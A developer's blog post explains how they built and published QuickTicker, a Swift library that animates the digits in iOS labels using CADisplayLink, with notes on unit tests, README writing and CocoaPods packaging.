It took me a while to figure out how I could create a function that accepts any Numeric value in a manner that is transparent to the user (thinking of the API boundary here). After some research online, I ended up using this answer on StackOverflow. This answer was posted before the Numeric protocol was made official in Swift, so at first I tried to adapt the answer to the existing Numeric protocol in the language, but after several unsuccessful attempts I ended up creating a NumericValue protocol that worked out beautifully (if you know of a way to make this work with Numeric, I would love to know how!)
Next we have the internal QTObject class. This class is necessary because I want to store several values over the course of the animation. Most notably, a weak reference to the animated label, the end value, a completion handler, a reference to the ongoing CADisplayLink (in order to stop it), and other options.
This object has an interesting method called getStartingValue(from: animationLabel):
As I mentioned in the list of features, QuickTicker updates the digits in your label while leaving the text intact. In other words, if you feed it a UILabel with the text “Temperature: 13F”, only the 13 part will get animated. This contributes to placing the boundary closer to the user’s code (less work for the user, no need to worry about mixing text with digits, but more code in the API to handle different scenarios).
To achieve this, the method above works like this:
- Try to convert to Double (using Double’s failable initializer)
- If it succeeds, return the digit (there is no text in the label)
- If it fails (there is text in the label), then find out where the digit starts and ends within the text
- Convert the value behind that start…end range to Double, that’s your starting value (the rest is either text, or a second digit, but we’re only concerned with the first digit we find)
To accomplish the above, I make use of another method called getFirstAndLastDigitIndexes. This one is pretty big, so I’m not gonna paste it in the article (you can see it here), but essentially what it does is define an NSCharacterSet with decimalDigits plus “.” then loop over the text looking for any matching characters (while accounting for edge cases, like a “.” in the middle of text)
Moving on to the QTObject initializer, when this gets called (by the class methods in QuickTicker), and once all the properties are initialized (including the starting value mentioned above), the CADisplayLink gets added to the default mode run loop, thereby starting the animation.
Small note regarding run loops: I intend to switch to common mode run loop in my next release, as I just learned that default mode can get blocked by touch events (i.e. scrolling your finger across the screen).
The CADisplayLink is tied to the device refresh rate, and is guaranteed to call its selector (the handleUpdate method in our case) on every screen refresh (every 16.7ms on a 60hz device); this gives you the entire 16.7ms duration to execute that method. Generally speaking, if you have CPU intensive code and wish to take advantage of that entire 16.7ms duration it’s better to use a CADisplayLink than a Timer, since timers can fire up slightly ahead or behind their intended time, thereby giving you less time to execute your code.
Next up is handleUpdateFor:
On every frame update, the handleUpdate method gets called. This method will check the elapsed time since the animation has started, and will calculate the current value for the label based on:
- The percentage of elapsed time / full duration
- Animation curve stated by the user (default is linear)
- End value stated by the user
- Number of decimals stated by the user
This is the crux of how the label animation works. Every frame update, you calculate how much time has passed since the animation has started, compare that against the full duration of the animation, and update the label accordingly. If we reached max duration, the displayLink is invalidated, and the completion handler is called.
For example, let’s say you wanted to animate a label from 0 to 40 over the course of 2 seconds. After 0.5 second has elapsed, you are 25% into the animation. With a linear curve, that means the label must show 25% of 40, i.e. 10 at that point in time.
There are a few interesting methods called over the course of the above process. First up is
getValueFromPercentage:
This will return a value based on the curve stated by the user. The easeIn curve is easy to calculate, since the percentage is a range from 0–1, so it’s just a matter of raising that percentage to the power of 2.8 (an arbitrary number I chose through trial and error to get a nice curve). To get the inverse curve (easeOut), I subtract the percentage from 1 before raising it to the power of 2.8, then subtract from 1 again.
The next method I wish to explore is updateLabel:
This will apply the desired number of decimal places to the calculated value before updating the label. The user can request a specific number of decimal places, such as 5 zeroes. If they don’t specify anything, the number will be inferred from the requested end value (e.g. if you specify 157.83 as the animation end value, then 2 decimal places will be maintained throughout the animation.
By default, Swift will discard extra zeroes after the decimal point. So if you enter something like
let x = 0.983010000 it will be converted to
0.98301 and we wouldn’t be able to respect the desired decimal places. To get around this, we call a function called
padValueWithDecimalsIfNeeded that looks like this:
This method does the following:
- Infer the number of decimal places from the calculated value (at that point in the animation)
- Compare it against the requested number of decimals
- If we are short (i.e. Swift discarded extra zeroes), then we pad it out to match the requested number
The second method used inside updateLabel is updateDigitsWhileKeepingText, which ensures that only the digits in the label get animated; the rest of the text stays intact. (just as we did in the beginning to infer the starting value)
This pretty much covers all the major parts of how the library works. There’s a total of 2 classes and 2 protocols, but I placed all of them in a single QuickTicker.swift file to make installation easier (just drag & drop one file). I like it when libraries let you do that (e.g. SwiftyJSON)
Example project
I decided to create an example project to showcase the library. This can be useful to generate some screenshots for the readme, and also to demonstrate to the user how the API calls work with some examples.
I personally find example apps really useful. For instance, when I implemented Google’s Cloud Firestore realtime database in one of my projects, the example helped me out a lot, especially to get acquainted with the API calls. I kept repeatedly referring back to the example app while working on my project to check how certain things are done.
For QuickTicker, I ended up building a single-page app with some sliders to let the user experiment with the different settings, as well as some pre-set counters at the bottom. It looks like this:
Some lessons learned while building the example app:
- If you intend to create a Cocoapod (more on that below), don’t build an example app manually. Let Cocoapods create it for you, then change it as you please. You’ll thank me later! 😃
- Use UIFont.monospacedDigitSystemFont for animated labels to prevent wobbling during the animation (especially when combining text with digits)
Unit Tests
This was an interesting one. I have limited experience writing unit tests; it’s definitely an area I need to work on 😄
When I started writing tests for this library, I quickly learned two things:
- In your tests file, you need to add a @testable keyword before your import statement in order to access internal classes
- You cannot access any private or fileprivate methods from your tests, even with @testable
The second one was pretty big for me. At that point, all of the classes and methods I had written were private except for the 3 class methods that I exposed to the user. I wanted to expose only the bare minimum so I wouldn’t pollute the user’s namespace with meaningless things like QTObject.
But in order to test the methods inside QTObject, I had to remove the private restriction, including the initializer for QTObject. I added a comment to the initializer, alerting the user not to call it directly and to use the class methods instead. And later on, I found out that since this is an internal class, if you install QuickTicker via Cocoapods, you can’t access it directly anyway. Perfect!
Here are the tests I wrote if you’re curious. Not comprehensive by any means, but still serviceable I think.
How to build a README.md
In the same excellent Swift & Fika 2018 conference I mentioned earlier, Roy Marmelstein gave a talk about open source in which he emphasized the importance of having a good readme page for your project on Github.
A good readme starts by explaining what the library is, and what you can do with it. Hopefully it’s something that’s usually hard but is easy with this library. Roy recommends creating a custom logo, and adding screenshots and especially gifs if applicable to your library (i.e. if it’s UI-related).
Other important sections include installation instructions and requirements, as well as an example project.
I started with a readme template, then I used these repos for inspiration:
Cocoapods
Next up was Cocoapods. I have used Cocoapods extensively in my projects before, but never actually created one. The process ended up being surprisingly straightforward.
To create the Cocoapod I followed tutsplus’ tutorial, along with Cocoapod’s own guides on their website.
One advice I’d like to reiterate here, is if you’re planning to include an example project in your library, let Cocoapods create the initial version (along with the test files), then modify it as you please. I had created the project myself, and then when I built the Cocoapod I ended with a second project, so I had to manually move files around from the old project to the new one. It’s a bit of a hassle.
Conclusion
I think I’ve covered all the major steps I went through while building this library! This was a fun weekend project, and I certainly learned a lot while doing it. To summarize some of the important points + some general advice:
- If there is a certain functionality that you keep adding to your projects over and over, consider packaging it up into an open source library
- Open source helps you build modular code and think in terms of APIs
- Before you start, consider where you want to place the API boundary
- If you place the boundary close to the user’s code (like I did with QuickTicker), expect to do more work on your side
- Try to future-proof your design, and plan for additive changes in the future as opposed to breaking user’s code in future updates (e.g. I added an options array that I can safely expand without breaking any existing code)
- If you intend to add an example project, and you wish to create a Cocoapod, let Cocoapods create the project + tests file for you
- Including an example project helps you generate screenshot (if applicable), and it helps introduce the users to your API
- Don’t forget about Unit Tests! Libraries with no tests get a lower CocoaPods Quality score
- And finally, having a good README.md file can be vital for the success of your library!
Hopefully, this article has inspired you to create your own open source library and share it with the world! Thanks for reading!
If you have any questions or suggestions, please leave a comment or tweet @BesherMaleh
You can find QuickTicker here.
If you’re curious, here are a couple of my apps that use this library | https://medium.com/@almalehdev/how-i-built-my-first-open-source-library-97d8bb2cc254 | CC-MAIN-2021-25 | refinedweb | 3,355 | 57.1 |
#include <Puma/CTree.h>
Base class for tree nodes representing lists.
List properties.
Constructor.
Add a list property.
Add a son.
Get the number of list entries.
Get the n-th list entry.
Get the list properties.
Get the index of the given son, or -1 if not found.
Insert a son before another son.
Insert a son at the given index.
Get a pointer to this CT_List.
Reimplemented from Puma::CTree.
Prepend a son.
Remove a son.
Remove the son at the given index.
Replace a son.
Reimplemented from Puma::CTree.
Replace the son at the given index.
Get the n-th son.
Reimplemented from Puma::CTree.
Reimplemented in Puma::CT_PrivateName.
Get the number of sons.
Implements Puma::CTree.
Reimplemented in Puma::CT_PrivateName, and Puma::CT_GnuLocalLabelStmt. | https://puma.aspectc.org/manual/html/classPuma_1_1CT__List.html | CC-MAIN-2021-39 | refinedweb | 127 | 66.1 |
Challenge Accepted!
code for
useMatchFetch down below.
import React from "react"; import { useMatchFetch } from "./effects/useMatchFetch"; export const Example = () => { const render = useMatchFetch(""); return render({ pending: () => <div>Loading</div>, error: err => <div>{err.toString()}</div>, data: data => <pre>{JSON.stringify(data, null, 2)}</pre> }); };
Watch my Live Stream
Want to see my process on how I created this? Watch me on Twitch!
useMatchFetch
I actually really like this. I think I might end up using this in a few places.
import { useState, useEffect } from "react"; const render = data => match => data.pending ? match.pending() : data.error ? match.error(data.error) : data.data ? match.data(data.data) : null // prettier-ignore export const useMatchFetch = url => { const [data, setData] = useState({ pending: true }); useEffect(() => { fetch(url) .then(response => response.json()) .then(data => setData({ data, pending: false })) .catch(error => setData({ error, pending: false })); }, [url]); return render(data); };
End
Follow me on Twitter @joelnet
Discussion (46)
I really think this is such a cool DEV use-case: Taking a tweet and expanding on, replying to and generally going deeper on the idea.
I also think a browser extension which could add a button like this to Twitter would be kind of awesome if anyone wants to build that 😄
Announcing off-platform "Share to DEV" functionality
Ben Halpern ・ Apr 26 '19 ・ 3 min read
We actually have an existing Twitter extension we haven't touched in a while but would definitely welcome this added functionality if anyone wants to make a PR (along with some other needed updates 😬)
Bringing dev.to headlines to your Twitter browsing experience.
DevTwitter Chrome Extension
Bringing dev.to headlines to your Twitter browsing experience.
Installing
Go to The Chrome Store to download the extension.
To access development releases, simply download or clone this code and load as an unpacked extension.
Unpacked Extension
hamburger menu > More Tools > Extensionsin the menu.
Load unpacked extension...and select the
chrome-extensionfolder.
Features
Future features
Twitter is a great way to connect and collaborate with other developers, and it would be fun to build in features that did that. The dev.to team will be thinking of ways to do this, but contributions are super welcome.
It is important…
Anyway, sorry to go on a tangent, this just made me happy. 🙂
I like this too. If someone has created a tweet, there's already some interest in that subject. I liked this tweet in particular because I kept thinking about it a few hours later.
Better integration would be awesome!
Heh, I've done that a couple of times, about git and about starting Node projects. I like the spark that a tweet can form in your mind and send you down a rabbit hole following ideas and writing code and posts in response.
Absolutely!
The fastest way to get me to do something is to tell me it can't be done!
I, too, want pattern matching in javascript and i also want Maybes and Eithers.
Same. You can use Maybes and Eithers today with a package import. The barrier is getting people familiar with them. Right now there's a lot of push back against them just because of familiarity bias.
If the language adopted them as native though, people would jump on board.
People are silly like that.
I think so too. Rust has them, they are called Option and Result. I secretly want Rust to become more popular so people can learn about them and how useful they are, and also start using them in other languages (and by other i mean javascript)
Interestingly, Rust has started to become more popular in Web Land as a language for writing WASM modules, in part because of the strong support from the Rust team themselves. See developer.mozilla.org/en-US/docs/W...
I like this one dev.to/_gdelgado/type-safe-error-h...
Currently im working on trying to reduce all the friction that happens when a language doesn’t support it more natively, hopefully have a post up with samples in the next month or so :)
You could try Z.
dev.to/kayis/pattern-match-your-ja...
Z looks interesting for sure. It's a little limited though. But it would work fine for this use case.
Glorious! I love the idea.
I'm not a super big fan of hooks, I still prefer HOC, so for those who are interested, here is a similar alternative I am testing out.
Alternatively, a HOC would work just as well, and be decoupled.
HOCs are another great way to solve this. Great examples!
I think it would be nice to have a
refetchaction so that the request can be remade even to the same url.
Also I think it would be nice to be able to distinguish then between the initial fetch, and future updates.
Also im debating with myself if I like the separate callbacks for each case, or if I would prefer being given the loading, data and error props together, and then do a more imperative approach with conditions. It seems more flexible.
In that case I would make the
renderfunction separately available, instead of wrapping it around the
data
Something along the lines of the react-apollo
graphqlHOC and
Querycomponent etc, but then for REST.
All great features! Submit a pull request ;)
Anyway, here it is; written in the train, so apologies for any typos ;-)
gist.github.com/patroza/4488f8fa2b...
Would love to, but where to? Where the codes at? :)
(Maybe im blind)
There's no repo for it. It was just a live stream demo :)
Nice write up! :)
Reminds me of these posts using daggy from fantasy-land
medium.com/javascript-inside/slayi...
datarockets.com/blog/javascript-pa...
nice little library that wraps it up
github.com/devex-web-frontend/remo...
One of the reasons, I decided not to make this an npm package. I figured something was already out there. I thought it would be fun to show the process.
Looks like those other libs have the same idea. I always love seeing an article with
daggy!
daggyis actually a perfect use case for this.
Cheers!
🍻
Yeah indeed a lot times there’s a solution but not a how to reach it write up or something like that so def keep coming with the process writes up for sure !! :)
That was one thing I found interesting about this process. Most of the time the ideal solution would be created ahead of time and then you would teach that process.
But it's interesting to see how you would think to get to that conclusion on your own.
I think that's the difference between live streams and tutorials. You get to see the thought process, which I really enjoy watching!
Cheers!
🍻
yah that process is fun, we used to do FP lunch sessions at an old job and refactor some current/legacy code into something we just learned or found interesting right on a big screen tv so everyone could watch and we talk thru the process.
Haha, I wrote the same thing and it was so quick that I didn't bother to post it.
I seldomly use any libraries in React, because it's so easy and quick to build them yourself. Just a hand full of small util compnents and you're good to go.
Agreed. Plus the problem with libraries is they have to cover the use cases of every application in the works. Most times your one liner function is enough for your use case.
This.
I couldn't write an equivalent to React-Router or Native-Navigation, but I don't have to. A 10line component covers the use-cases I have.
Reminds me a lot of this component package
I ran into a few different packages that did something very similar. This is the reason I didn't create an npm package. I think there are enough already.
But I thought the process would be fun, which is why I lived streamed it.
Hopefully people enjoy the process that went into making it happen.
Cheers!
🍻
I hope it was fun! Sorry if my comment implied I didn't see value in this, I totally do. I dig seeing the thought process behind the code in addition to the code itself. Have a good one!
No your comment didn't imply that it wasn't fun. I got you ;)
You too!
Very functional and very Elm'ish.
I've watched this talk and it covered exactly that.
Thanks for the tip! I'm saving this video to my Watch Later.
Definitely worth watching. You might find some inspiration on how to improve your React code even more :)
There's always room for improvement!
Your code is subject to race conditions.
See dev.to/sebastienlorber/handling-ap...
You'd rather use a lib that solves it for you with all the edge cases, like github.com/slorber/react-async-hook
Yep this is correct! Any previous
fetchneeds to be aborted.
Since this code was just for fun, I don't think I'll be spending the time to add these cases into it. But if someone wants to contribute a gist, i'll gladly link it.
Cheers!
I'd probably use ReasonReact for this :D
ReactReason is a very interesting project. It's hard to convince large companies to switch to a totally different language though.
I'm still looking forward to playing with ReasonML for some personal projects.
What if you want to render a loader while new data is loading? That means you'd render a loader + the current data at the same time. Same with errors.
Submit a pull request ;)
Scala-js allows writing react components this way
This sounds pretty cool. I haven't seen scalajs but if it has pattern matching I'm down!
First time that I "unicorned" article! Well played Sir!
I'm so honored 😁
Wow!
Cheers!
🍻 | https://practicaldev-herokuapp-com.global.ssl.fastly.net/joelnet/react-i-really-wish-this-is-how-i-could-write-components-1k4j | CC-MAIN-2021-10 | refinedweb | 1,648 | 66.54 |
Shouldn't the getter be named "getPName"?
Dave
(pardon brevity, typos, and top-quoting; on cell)
On Nov 2, 2012 1:09 AM, "Maliwei" <mlw5415@gmail.com> wrote:
> As I have desc in the mail title, and see the code below:
>
> /**--------------code start----------**/
> import ognl.Ognl;
> import ognl.OgnlException;
> class Hello {
> private String pName;
> public String getpName() {
> return pName;
> }
> public void setpName(String pName) {
> this.pName = pName;
> }
> }
>
> public class OgnlTest {
> public static void main(String[] args) {
> Hello action = new Hello();
> action.setpName("pName.Foo");
> try {
> Object pName = Ognl.getValue("pName", action);
> System.out.println(pName);
> } catch (OgnlException e) {
> //this will happen when use version 2.7+ and 3.x
> e.printStackTrace();
> }
> }
> }
> /**--------------code end----------**/
>
> According to JavaBeans Spec sec 8.8 "Capitalization of inferred names":
> Thus when we extract a property or event name from the middle of an
> existing Java name, we normally convert the first character to lower case.
> However to support the occasional use of all upper-case names, we check if
> the first two characters of the name are both upper case and if so leave it
> alone. So for example,
> “FooBah” becomes “fooBah”
> “Z” becomes “z”
> “URL” becomes “URL”
> We provide a method Introspector.decapitalize which implements this
> conversion rule.
> String java.beans.Introspector.decapitalize(String name)
>.
> Thus "FooBah" becomes "fooBah" and "X" becomes "x", but "URL" stays as
> "URL".
>
>
>
>
>
> Best Regards
> Ma Liwei | http://mail-archives.apache.org/mod_mbox/commons-user/201211.mbox/%3CCADJJoV7uf6GK6AgtahxMzEkyhxPhF7kfMjaVp1oZdeDM3P538A@mail.gmail.com%3E | CC-MAIN-2014-52 | refinedweb | 228 | 59.5 |
Project Euler 66: Investigate the Diophantine equation x2 − Dy2 = 1.
Problem Description.
Analysis
Using the chakravala method for solving minimal solutions to Pell’s Equation. A detailed explanation is posted in the comments section.
Project Euler 66 SolutionRuns < 0.005 seconds in Python 2.7.
from Euler import sqrt, prime_sieve def pell(d): p, k, x1, y, sd = 1, 1, 1, 0, sqrt(d) while k != 1 or y == 0: p = k * (p/k+1) - p p = p - int((p - sd)/k) * k x = (p*x1 + d*y) / abs(k) y = (p*y + x1) / abs(k) k = (p*p - d) / k x1 = x return x L = 1000 print "Project Euler 66 Solution:", max((pell(d),d) for d in prime_sieve
- D=92821 for D ≤ 100000 in 15 seconds.
Solution of “Pell’s Equation” by Chakravala Method by Gopal Menon
It was discovered by Brahmagupta that a triple (a, b, k), representing the equation a2 – Nb2 = k, can be composed with the trivial triple (m, 1, m2 – N) to get a new triple (am + Nb, a + bm, k(m2 – N)). Scaling down by k, using Bhaskara’s lemma, we get,
a2 – Nb2 = k ==> {(am + Nb)/k}2 – N{(a + bm)/k}2 = (m2 – N)/k
The following is the algorithm for solving “Pell’s equation”, x2 – Ny2 = 1, as given by the Indian mathematicians who were the first to solve this equation:
- For the given value of N (which is not a perfect square) replace x by a, y by b and 1 by k and solve the equation a2 – Nb2 = k. Let the initial value of b be 1 and select the initial value of a such that the square of the number is as close to N as possible so as to get the least absolute value of k. Note that k may be either positive or negative but not zero.
- Now select an integer m such that k divides a + bm and the absolute value of m2 – N is minimum.
- Now replace a by the absolute value of (am + Nb)/k and b by the absolute value of (a + bm)/k.
- Now replace k by a2 – Nb2. Note that k may be either positive or negative but not zero.
- If the new value of k is 1 we have got the solution. The value of x is a and that of y is b.
- If the value of k is not equal to 1 we go for the first iteration and repeat steps 1 to 5. We keep on doing this until the value of k becomes 1 and we thus get the values of x and y which satisfies “Pell’s equation” for the given value of N.
- Using Brahmagupta’s lemma, if the value of k assumes a value of -1 or ± 2 for any value of a and b or if the value of k assumes a value of ± 4 and either a or b is an even number, we can stop further iterations and compose the triple with itself to get the final solution.
a2 – Nb2 = k ==> {(a2 + Nb2)/k}2 – N{(ab)/k}2 = 1
An example with N = 53 is given below.
- Since N = 53, we initially select a = 7 and b = 1 to get k = -4.
- We have to now select an integer m such that 4 divides 7 + m and the absolute value of m2 – 53 is minimum. Therefore m should be of the type 4t + 1 for integer values of t. To minimise the absolute value of m2 – 53, m should be 5.
- Hence, in the first iteration we get the new values of a and b as the absolute value of (am + Nb)/k and (a + bm)/k respectively. Thus we get a = (7×5 + 53×1)/4 = 22, b = (7 + 1×5)/4 = 3 and k = (52 – 53)/(-4) = 7.
- In the second iteration we have to select an integer m such that 7 divides 22 + 3m and the absolute value of m2 – 53 is minimum. Therefore m should be of the type 7t + 2 for integer values of t. To minimise the absolute value of m2 – 53, m should be 9.
- The new values of a and b are now the absolute value of (am + Nb)/k and (a + bm)/k respectively. Thus we get a = (22×9 + 53×3)/7 = 51, b = (22 + 3×9)/7 = 7 and k = (92 – 53)/7 = 4.
- In the third iteration we select m = 7 to get the revised values of a = 182, b = 25 and k = -1.
- Since the value of k is now -1, we can use Bhaskara’s lemma an compose the triple with itself. Since a = 182, b = 25 and k = -1, we get x = (1822 + 53×252)/1 = 66249, y = 2x182x25/1 = 9100 and k = 1.
- Thus, the solution to the equation is 662492 – 53 x 91002 = 1.
- From this we can also get the value of √53 as 7.28010989010989. This value differs from the value obtained from the square root function of the spreadsheet by just 0.000000011 %.
- This method always terminates with a solution (when the value of k becomes 1) for all values of N (other than perfect squares).
Just one (dumb) quick question.
Why D has to be prime?
Stranger still is that they are all primes of the form 4k+1. A complete explanation, much better that I could hope to do, is located here:
Will you please explain , how you implement these steps ??
p = k * (p/k+1) – p
p = p – int((p – sd)/k) * k
I added a discussion of the algorithm written by Gopal that explains all the steps required.
Hi Mike,
Sure, it is obvious that these two serve the purpose of ensuring that a + bm (or x1 + py, in your notation) is divisable by k and that m*m – N is minimal. However, it’s really interesting how you made it happen without referring to x1 and y.
If you could explain that, I’d very much appreciate it.
Thanks,
Janko
I solved this problem over a decade ago and then discovered the “Chaka Lacka Boom Boom” (chakravala) method to help improve performance.
The two statements you referenced are a direct result of implementing this algorithm and the following reference provides a good explanation of how it works:
Thanks | https://blog.dreamshire.com/project-euler-66-solution/ | CC-MAIN-2018-09 | refinedweb | 1,056 | 76.35 |
The Practical Client
If you want to ensure that the right code is loaded at the right time (and only loaded when you need it), you can use TypeScript code to organize your code into modules. As a side benefit, managing your script tags will get considerably easier.
When combined with a module manager, TypeScript modules are great for two reasons. First, modules eliminate the need for you to make sure that you stack your script tags in the right order. Instead, within each script file you specify which other files your code depends on and the module manager establishes the right dependency hierarchy -- in your page, all you need is a single script tag for the code file that kicks everything off.
Second, the module manager loads your code files asynchronously as they're needed. If, as a user works through your application, some code file is never needed, then it will never get hauled down to the browser. Even if your user does use all the code files, deferring loading script files until you need them can significantly improve the loading time for your pages.
I discussed modules in my second Practical TypeScript column in May 2013 (except, back then, the column was called Practical JavaScript and I was using TypeScript 0.8.3). Much has changed in TypeScript since then and now's a good time to revisit the topic because some of those changes are part of the latest version of the language, TypeScript 2.1.
There has been one major change since the first version of TypeScript: What were called "internal modules" in the earliest versions of TypeScript are now called namespaces. TypeScript namespaces act like .NET Framework namespaces and should be used to organize related components (classes, enums and so on) to help developers discover them. This article uses "modules" in the current sense of the term: as a way of managing and loading script resources on an as-needed basis.
Setting Up
For this column I'm using TypeScript 2.1 in Visual Studio 2015. I used NuGet to add RequireJS to my project as my module loader. You don't, however, have to use RequireJS. TypeScript syntax for working with modules is "implementation-neutral": Whatever code you write in TypeScript is translated by the compiler into whatever function calls are required by your module loader. To tell the TypeScript compiler to generate RequireJS-compatible JavaScript code, I added this line to my tsconfig.json file which specifies that I'm using the UMD format which is compatible with both AMD (the original module loader, implemented in RequireJS) and CommonJS (which is popular with Node developers):
"module": "umd"
The code in this article works equally well with module set to amd. Angular developers using SystemJS should set module to system (I'm told).
Picking RequireJS does mandate the format of the script tag that I use to start my application. First, of course, I have to add a script tag to my page to load the RequireJS library. However, to cause RequireJS to load my application's initial script file, I must add a data-main attribute to the script tag that references that initial script file. The path to my script file is usually a relative filepath (relative to the location of the RequireJS script file).
For this case study, I put all my files in the Script folder. However, my RequireJS script file is directly in my application's Scripts folder, while my initial script file (CustomerManagement.ts) is in a subfolder called Application. To invoke RequireJS and point it at my initial script file, I add this tag to my page's <head> element:
<script src="Scripts/require.js"
data-</script>
Notice that, no matter how many files I organize my TypeScript code into, I only need a single script tag on each page. When RequireJS loads CustomerManagement.js, it will check to see what files CustomerManagement.js requires and load them (and so on, through the dependency hierarchy).
Creating an Export File
To create a file of useful code that I'd like to be available for use in some other file, all I need to do is create a TypeScript file and add my declarations to it. I add the keyword export to each declaration that I want to use outside the file. Listing 1 shows an example of a CustomerEntities file that exports an enum, a constant, an interface, a base class, a derived class and a function. To make this case study more interesting I put this file in another Scripts subfolder, which I called Utilities.;
}
function MakeNewPremiumCustomer(custId: string): PremiumCustomer {
let pcust: PremiumCustomer;
pcust = new PremiumCustomer();
pcust.Id = custId;
pcust.CreditStatus = defaultCreditStatus;
pcust.CreditLimit = 100000;
return pcust;
}
I could have enclosed my exported components in a module, like this:
export module Customers
{
export enum CreditStatusTypes {
//...rest of module...
However, that module name establishes a qualifier that I'd have to use when referring to any component in the module. For example, in any code that uses CreditStatusTypes enum I'd have to refer to it as Customers.CreditStatusType. That may not seem like a bad thing -- it might even sound helpful because it could help avoid name collisions if you import two modules, both of which contain something called CreditStatusType.
But, as I'll discuss in a later column, you have other options to handle name collisions. As a result, using a module may simply insert another namespace level into your component's names without adding any value. Nor does enclosing all the components in the module save you any code -- you still have to flag each component with the export keyword (as I did with the CreditStatusTypes in my example). I don't use the module keyword in my modules.
Importing Components
Now, in my application code, to create a PremiumCustomer class, I need access to the MakeNewPremiumCustomer function and the PremiumCustomerClass. To get that access, I just add an import statement that imports those components from my module. Because my application code is in a file in my Scripts/Application folder, the import statement it uses (with a relative address pointing to my CustomerEntities module in Scripts/Utilities), looks like this:
import { PremiumCustomer, MakeNewPremiumCustomer } from "../Utilities/CustomerEntities"
By the way, if you've set noUnusedLocal to true in your tsconfig file, then you'll be obliged to use any component you reference in your import statements or your code won't compile.
But I'm not done yet. While I've reduced the mass of script tags that I might need at the start of a page to a single reference to RequireJS, I've only looked at the simplest ways to export and import module components. Next month I'm going to focus on some more architectural issues you should consider when creating modules (along with the code you need to manage those modules, of | https://visualstudiomagazine.com/articles/2017/02/01/managing-modules.aspx | CC-MAIN-2019-13 | refinedweb | 1,153 | 60.24 |
Note: Jon's Radio has moved to InfoWorld
storyList
Jon's homepage
This discussion snippet asks and answers some more questions that I immediately had. In particular, it clarifies that only static HTML is delivered to the public host (which by default is Apache). That explains why there's no built-in search -- it's functionality that's not exportable as static HTML.
That said, let's not sneer at static HTML. In fact, Radio is using a technique that I continue to rely on heavily in managing websites. I call it dynamic generation of statically-served pages.
For example, I put the following into /radio/Macros/test.txt:
on test (s) { return ("<u>" + s + "</u>")}
and then I put this into /radio/www/test.txt
#title "test"<%test ("the sample text")%>
My local server responds to /test.txt like so:
the sample text
And the public server gave the same result in response to /test.html.
When I change the call to:
#title "test"<%test ("some different text")%>
It changed in both places.
However, when I changed the underlying macro to:
on test (s) { return ("<b>(" + s + ")</b>")}
The bolded, rather than underlined, rendering appeared only locally, not on the public server. To force the change to appear on the public side, I tried deleting/recreating /radio/Macros/test.txt. That didn't do it. I did succeed, finally, by deleting/recreating /radio/www/test.txt, the page that uses the macro.
Perhaps there's a synchronization strategy I don't yet understand. Or perhaps there are some kinks to be worked out. But in general, for the kinds of communication that Radio is meant to enable -- collaboration, knowledge management -- the marriage of a dynamic content renderer with a static page server can be highly practical and efficient.
Hmm. The synch issue are interesting. For example, I just changed my navigator.xml to include links to the Radio and RSS categories. They appear on the home page, and on the Radio category page, because these were both refreshed by my last post. However they don't appear on the RSS category page, and won't, I guess, until I route something there that forces a refresh. Is there a "Force Refresh of Everything" option?
Later...OK, found it. It's in the GUI-based tool, rather than the browser-based one. Radio->Publish->Entire Website did the trick.
This observation about no self-hosting was something I noticed right away.
Now I want to recategorize the posting, having decided that the newly-created RSS category is more appropriate than the original Radio category.
Well, fair enough. Radio did not remove:
but did add:
Meanwhile, I am categorizing this item both ways: under Radio and RSS.. | http://radio.weblogs.com/0100887/categories/radio/2002/01/15.html | crawl-002 | refinedweb | 456 | 66.74 |
Asked by:
How to get Odata Response without Etag using Microsoft.AspNet.OData
Question
- User-1243834164 posted
As per my requirement whenever I am calling ODATA V4 controller get request, from ajax I don't want to get Odata.Etag from response.
How can we achieve this. Is there any Web Api Odata server side configuration to disable Etags?
"@odata.context": "",
"@odata.count": 1,
"value": [{
"@odata.etag": "W/\"YmluYXJ5J0FBQUFBRnFFUUE4PSc=\"",Thursday, February 15, 2018 5:20 PM
All replies
- User283571144 posted
Hi evurihanumantharao,How can we achieve this. Is there any Web Api Odata server side configuration to disable Etags?
As far as I know, if don't enable the [TimeStamp] attribute or the [ConcurrencyCheck]attribute in your data model.
It will not add the etag in the response.
So I suggest you could recheck your model to make sure you don't add the attribute.
Here I also create an example with etag in odata v4.
The data model.
public class Person { [Key] public int Id { get; set; } [Required] public string Name { get; set; } [Required] [Timestamp] public int Age { get; set; } }
Result:
If I remove the "[Timestamp]" or " [ConcurrencyCheck]", it will not generate the etag.
Best Regards,
BrandoFriday, February 16, 2018 6:44 AM
- User-1243834164 posted
Thanks for your response.
If I change the TimeStamp/ConcurrencyCheck that will impact on my entity framework behavior. I am looking for the option which can work at Odata Level. I need to eliminate this tag from Odata responses.Wednesday, February 21, 2018 7:27 PM
- User-166373564 posted
Hi,
Either use either the [TimeStamp] attribute or the [ConcurrencyCheck] attribute but not both.
See the "Support for ETags" section in this MSDN blog post.
Regards,
AngieFriday, February 23, 2018 10:01 AM
- User-1101824297 posted
For anyone else stumbling across this post, we found that adding an [IgnoreDataMember] attribute to the property solves this (unless you absolutely need the property with the Timestamp attribute in your response)Wednesday, May 15, 2019 9:18 PM | https://social.msdn.microsoft.com/Forums/en-US/fad7de81-1a19-42b6-807d-96ec300845fa/how-to-get-odata-response-without-etag-using-microsoftaspnetodata?forum=aspwebapi | CC-MAIN-2022-33 | refinedweb | 331 | 65.12 |
Your browser does not seem to support JavaScript. As a result, your viewing experience will be diminished, and you have been placed in read-only mode.
Please download a browser that supports JavaScript, or enable it if it's disabled (i.e. NoScript).
Hello,
I have a unclosed spline with 5 points and an offset from 0 to 1 where 0.0 is on point 0, 0.25 is on point 1, 0.5 on point 2 and so on. I think this is meant as not realoffset. The distances between the points are different. But for example the sweep growth works with real offsets, I guess. How can I convert an notRealOffset into a RealOffset? I tried to use SplineHelp(), but dont get I to work rigth now.
Thx for any hints
rownn
Hi Rownn, thanks for reaching us.
With regard to your question, as pointed out in our documentation you can move back and forth from percentage to unit offset by using:
A few observations now:
Let's see two simple cases:
splineLength: 849.075096635
customLength: 400
lengthRatio (customLength / splineLength): 0.471100850308
GetOffsetFromReal(lengthRatio,0): 0.452809444459
GetOffsetFromUnit(customLength,0): 0.452809444459
splineLength: 845.774079501
customLength: 400
lengthRatio (customLength / splineLength): 0.472939535148
GetOffsetFromReal(lengthRatio,0): 0.472783546885
GetOffsetFromUnit(customLength,0): 0.47278354688
In the second case the ratio expressed by the arbitrary length and the overall curve length matches the offset which is completely correct considering the Uniform option
Let me know if it helps to address your question or if there are further points to better discuss.
Riccardo
EDIT: I've fixed the naming convention the text snippets to make it more readable
Hi Riccardo,
thanks for your detailed reply. I think I will need some more concentration to get it clear. Is lengthRatio=custom/spline length ratio and customLength=custom lenght=400?
